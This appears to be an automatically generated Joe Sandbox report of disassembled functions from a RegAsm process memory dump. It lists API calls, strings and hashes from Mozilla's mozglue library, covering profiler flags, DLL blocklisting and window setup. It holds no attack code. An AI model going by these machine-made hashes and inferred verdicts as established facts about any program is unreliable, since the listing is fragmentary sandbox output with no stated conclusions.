                                                                                      • API String ID: 304294125-0
                                                                                      • Opcode ID: 6d85136299953afef910a9543d1344d7aae5ab20ee36b63841e352745728810c
                                                                                      • Instruction ID: 7d843c065294caa01f95feffcc67a734e4aab1fa320a2c973e4f7cd5af7ee216
                                                                                      • Opcode Fuzzy Hash: 6d85136299953afef910a9543d1344d7aae5ab20ee36b63841e352745728810c
                                                                                      • Instruction Fuzzy Hash: 79F0AFB0A0420CAEEF019BA5CC84BEEB7BD9B0831AF509239E511656C0D7789598C660
                                                                                      APIs
                                                                                      • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0F03D4,?), ref: 6C14B955
                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C14B9A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryQueryVirtualrand_s
                                                                                      • String ID:
                                                                                      • API String ID: 1889792194-0
                                                                                      • Opcode ID: 3de1de142c95a3f856051a2b36f66153ae27cfe89058c94a658fcc85d1d3f302
                                                                                      • Instruction ID: 566bc6dda74f16b6e36323a2d02d7cafae6c0f391b34a63ef28658ff7efc65a8
                                                                                      • Opcode Fuzzy Hash: 3de1de142c95a3f856051a2b36f66153ae27cfe89058c94a658fcc85d1d3f302
                                                                                      • Instruction Fuzzy Hash: AB41D671F016199FDF04CFA9D890ADEB7B6EF88314F248139E515A7704DB30A945CB90
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(user32,?,6C11E1A5), ref: 6C145606
                                                                                      • LoadLibraryW.KERNEL32(gdi32,?,6C11E1A5), ref: 6C14560F
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C145633
                                                                                      • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C14563D
                                                                                      • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C14566C
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C14567D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C145696
                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C1456B2
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C1456CB
                                                                                      • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C1456E4
                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C1456FD
                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C145716
                                                                                      • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C14572F
                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C145748
                                                                                      • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C145761
                                                                                      • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C14577A
                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C145793
                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C1457A8
                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C1457BD
                                                                                      • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C1457D5
                                                                                      • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C1457EA
                                                                                      • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C1457FF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                      • API String ID: 2238633743-1964193996
                                                                                      • Opcode ID: f01edce503a571349eeac646deca84ff135cedc83d4ffc7f673408720757faa4
                                                                                      • Instruction ID: 287ea0d19c73ce590dae102af297f579bc8d6e9a9451489ad20a07932385fd07
                                                                                      • Opcode Fuzzy Hash: f01edce503a571349eeac646deca84ff135cedc83d4ffc7f673408720757faa4
                                                                                      • Instruction Fuzzy Hash: 9151F3B57117179BDB019F378D58A363AF8AB17349710842AB931E2A52FF74CC20AF61
                                                                                      APIs
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C0F582D), ref: 6C12CC27
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C0F582D), ref: 6C12CC3D
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C15FE98,?,?,?,?,?,6C0F582D), ref: 6C12CC56
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C0F582D), ref: 6C12CC6C
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C0F582D), ref: 6C12CC82
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C0F582D), ref: 6C12CC98
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0F582D), ref: 6C12CCAE
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C12CCC4
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C12CCDA
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C12CCEC
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C12CCFE
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C12CD14
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C12CD82
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C12CD98
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C12CDAE
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C12CDC4
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C12CDDA
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C12CDF0
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C12CE06
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C12CE1C
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C12CE32
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C12CE48
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C12CE5E
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C12CE74
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C12CE8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: strcmp
                                                                                      • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                      • API String ID: 1004003707-2809817890
                                                                                      • Opcode ID: 2ceeac816acdcf087f908e2562310589136ccc0e6d507f487f92393cddf76c0d
                                                                                      • Instruction ID: 030f5aa3e98c2c766368d7c44e0ead7ec777948de9214b9d275ff3bdf8c192a3
                                                                                      • Opcode Fuzzy Hash: 2ceeac816acdcf087f908e2562310589136ccc0e6d507f487f92393cddf76c0d
                                                                                      • Instruction Fuzzy Hash: AE51FBC9A4522D12FB0035156D34BAA1409EF6725EF50443AEF29A1F81FF0DD2A9C6F7
                                                                                      APIs
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C0F4801
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0F4817
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0F482D
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C0F484A
                                                                                        • Part of subcall function 6C11AB3F: EnterCriticalSection.KERNEL32(6C16E370,?,?,6C0E3527,6C16F6CC,?,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB49
                                                                                        • Part of subcall function 6C11AB3F: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E3527,6C16F6CC,?,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11AB7C
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C0F485F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C0F487E
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C0F488B
                                                                                      • free.MOZGLUE(?), ref: 6C0F493A
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F4956
                                                                                      • free.MOZGLUE(00000000), ref: 6C0F4960
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C0F499A
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • free.MOZGLUE(?), ref: 6C0F49C6
                                                                                      • free.MOZGLUE(?), ref: 6C0F49E9
                                                                                        • Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
                                                                                        • Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
                                                                                        • Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2
                                                                                      Strings
                                                                                      • MOZ_PROFILER_SHUTDOWN, xrefs: 6C0F4A42
                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C0F4812
                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C0F4828
                                                                                      • [I %d/%d] profiler_shutdown, xrefs: 6C0F4A06
                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0F47FC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                      • API String ID: 1340022502-4194431170
                                                                                      • Opcode ID: 9f9d9e8f02ae9a5230d9f3dfb2538d5ccaf023d3c95c61e9f2d9901a88c14add
                                                                                      • Instruction ID: 68d192ef7d5b9b782fd0788811cb40144cd49f521bbc8d90025f0fc1567ad823
                                                                                      • Opcode Fuzzy Hash: 9f9d9e8f02ae9a5230d9f3dfb2538d5ccaf023d3c95c61e9f2d9901a88c14add
                                                                                      • Instruction Fuzzy Hash: B7814774B04100ABDB00DFA9CA4876E33F1AF42318F140225ED3297F41E731E996DB96
                                                                                      APIs
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F760), ref: 6C0F19BD
                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C0F19E5
                                                                                      • GetLastError.KERNEL32 ref: 6C0F1A27
                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C0F1A41
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0F1A4F
                                                                                      • GetLastError.KERNEL32 ref: 6C0F1A92
                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C0F1AAC
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0F1ABA
                                                                                      • LocalFree.KERNEL32(?), ref: 6C0F1C69
                                                                                      • free.MOZGLUE(?), ref: 6C0F1C8F
                                                                                      • free.MOZGLUE(?), ref: 6C0F1C9D
                                                                                      • CloseHandle.KERNEL32(?), ref: 6C0F1CAE
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F760), ref: 6C0F1D52
                                                                                      • GetLastError.KERNEL32 ref: 6C0F1DA5
                                                                                      • GetLastError.KERNEL32 ref: 6C0F1DFB
                                                                                      • GetLastError.KERNEL32 ref: 6C0F1E49
                                                                                      • GetLastError.KERNEL32 ref: 6C0F1E68
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0F1E9B
                                                                                        • Part of subcall function 6C0F2070: LoadLibraryW.KERNEL32(combase.dll,6C0F1C5F), ref: 6C0F20AE
                                                                                        • Part of subcall function 6C0F2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0F20CD
                                                                                        • Part of subcall function 6C0F2070: __Init_thread_footer.LIBCMT ref: 6C0F20E1
                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0F1F15
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F1F46
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F1F52
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F1F59
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F1F60
                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0F1F6D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                                      • String ID: D
                                                                                      • API String ID: 290179723-2746444292
                                                                                      • Opcode ID: 15e54d9b55a7a1deb7e63f0e0484e38664dcf1f908f623ef88be036c4cf9ece4
                                                                                      • Instruction ID: 9e54dc1d1c38775ffa3a169c21d8288be62848351afc634a6855fb0ba4aa607f
                                                                                      • Opcode Fuzzy Hash: 15e54d9b55a7a1deb7e63f0e0484e38664dcf1f908f623ef88be036c4cf9ece4
                                                                                      • Instruction Fuzzy Hash: 20F181B1A00325AFEB209F65CC48BAAB7F4FF49704F104199E915A7640E774EE91DFA0
                                                                                      APIs
                                                                                        • Part of subcall function 6C0F4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0F44B2,6C16E21C,6C16F7F8), ref: 6C0F473E
                                                                                        • Part of subcall function 6C0F4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0F474A
                                                                                      • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0F44BA
                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0F44D2
                                                                                      • InitOnceExecuteOnce.KERNEL32(6C16F80C,6C0EF240,?,?), ref: 6C0F451A
                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0F455C
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 6C0F4592
                                                                                      • InitializeCriticalSection.KERNEL32(6C16F770), ref: 6C0F45A2
                                                                                      • moz_xmalloc.MOZGLUE(00000008), ref: 6C0F45AA
                                                                                      • moz_xmalloc.MOZGLUE(00000018), ref: 6C0F45BB
                                                                                      • InitOnceExecuteOnce.KERNEL32(6C16F818,6C0EF240,?,?), ref: 6C0F4612
                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0F4636
                                                                                      • LoadLibraryW.KERNEL32(user32.dll), ref: 6C0F4644
                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0F466D
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F469F
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F46AB
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F46B2
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F46B9
                                                                                      • VerSetConditionMask.NTDLL ref: 6C0F46C0
                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0F46CD
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6C0F46F1
                                                                                      • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0F46FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                      • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                      • API String ID: 1702738223-3894940629
                                                                                      • Opcode ID: a11742af9047068b13614056fc6dac90ae5f56b9b37718089dfca686c50d35d9
                                                                                      • Instruction ID: 20084878193e5d99107c1f5330dc4cc900f026a28bafd739f102f432ec8459dc
                                                                                      • Opcode Fuzzy Hash: a11742af9047068b13614056fc6dac90ae5f56b9b37718089dfca686c50d35d9
                                                                                      • Instruction Fuzzy Hash: FD612AB0604344AFEB10DFA2CD09BA977F8EF4630CF048198ED249BA41D7B09A96DF51
                                                                                      APIs
                                                                                      • strchr.VCRUNTIME140(00000000,0000002E), ref: 6C10BC5A
                                                                                      • strchr.VCRUNTIME140(00000001,0000002E), ref: 6C10BC6E
                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6C10BC9E
                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C10BE33
                                                                                      • VerSetConditionMask.NTDLL ref: 6C10BE65
                                                                                      • VerSetConditionMask.NTDLL ref: 6C10BE71
                                                                                      • VerSetConditionMask.NTDLL ref: 6C10BE7D
                                                                                      • VerSetConditionMask.NTDLL ref: 6C10BE89
                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C10BE97
                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C10BEE4
                                                                                      • VerSetConditionMask.NTDLL ref: 6C10BF15
                                                                                      • VerSetConditionMask.NTDLL ref: 6C10BF21
                                                                                      • VerSetConditionMask.NTDLL ref: 6C10BF2D
                                                                                      • VerSetConditionMask.NTDLL ref: 6C10BF39
                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C10BF47
                                                                                        • Part of subcall function 6C14AAE0: GetCurrentThreadId.KERNEL32 ref: 6C14AAF8
                                                                                        • Part of subcall function 6C14AAE0: EnterCriticalSection.KERNEL32(6C16F770,?,6C10BF9F), ref: 6C14AB08
                                                                                        • Part of subcall function 6C14AAE0: LeaveCriticalSection.KERNEL32(6C16F770,?,?,?,?,?,?,?,?,6C10BF9F), ref: 6C14AB6B
                                                                                      • free.MOZGLUE(00000000), ref: 6C10BFF0
                                                                                      • _strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6C10C014
                                                                                        • Part of subcall function 6C14AC20: CreateFileW.KERNEL32 ref: 6C14AC52
                                                                                        • Part of subcall function 6C14AC20: CreateFileMappingW.KERNEL32 ref: 6C14AC7D
                                                                                        • Part of subcall function 6C14AC20: GetSystemInfo.KERNEL32 ref: 6C14AC98
                                                                                        • Part of subcall function 6C14AC20: MapViewOfFile.KERNEL32 ref: 6C14ACB0
                                                                                        • Part of subcall function 6C14AC20: GetSystemInfo.KERNEL32 ref: 6C14ACCD
                                                                                        • Part of subcall function 6C14AC20: MapViewOfFile.KERNEL32 ref: 6C14AD05
                                                                                        • Part of subcall function 6C14AC20: UnmapViewOfFile.KERNEL32 ref: 6C14AD1C
                                                                                        • Part of subcall function 6C14AC20: CloseHandle.KERNEL32 ref: 6C14AD28
                                                                                        • Part of subcall function 6C14AC20: UnmapViewOfFile.KERNEL32 ref: 6C14AD37
                                                                                        • Part of subcall function 6C14AC20: CloseHandle.KERNEL32 ref: 6C14AD43
                                                                                        • Part of subcall function 6C14AE70: GetCurrentThreadId.KERNEL32 ref: 6C14AE85
                                                                                        • Part of subcall function 6C14AE70: EnterCriticalSection.KERNEL32(6C16F770,?,6C10C034), ref: 6C14AE96
                                                                                        • Part of subcall function 6C14AE70: LeaveCriticalSection.KERNEL32(6C16F770,?,?,?,?,6C10C034), ref: 6C14AEBD
                                                                                      Strings
                                                                                      • accelerator.dll, xrefs: 6C10BC8E, 6C10BC9D
                                                                                      • LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6C10BF5B
                                                                                      • LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6C10BFCF
                                                                                      • LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6C10BDDD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
                                                                                      • String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
                                                                                      • API String ID: 3889411031-3373514183
                                                                                      • Opcode ID: ceb005bd9f7167d0175e969b03722446035b31860938caf6d5c9dcb107b67e32
                                                                                      • Instruction ID: 05a639380cb3e607f18a4d291c0e13a450f55daf281cecbe0a835825e7ec4d66
                                                                                      • Opcode Fuzzy Hash: ceb005bd9f7167d0175e969b03722446035b31860938caf6d5c9dcb107b67e32
                                                                                      • Instruction Fuzzy Hash: 78E10671B043009BEB10DF24C994BAAB7F5EF95318F04896DE99587B80DF74A948CB92
                                                                                      APIs
                                                                                        • Part of subcall function 6C127090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C12B9F1,?), ref: 6C127107
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C12DCF5), ref: 6C12E92D
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EA4F
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EA5C
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EA80
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EA8A
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C12DCF5), ref: 6C12EA92
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C12EB11
                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EB1E
                                                                                      • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C12EB3C
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EB5B
                                                                                        • Part of subcall function 6C125710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C12EB71), ref: 6C1257AB
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
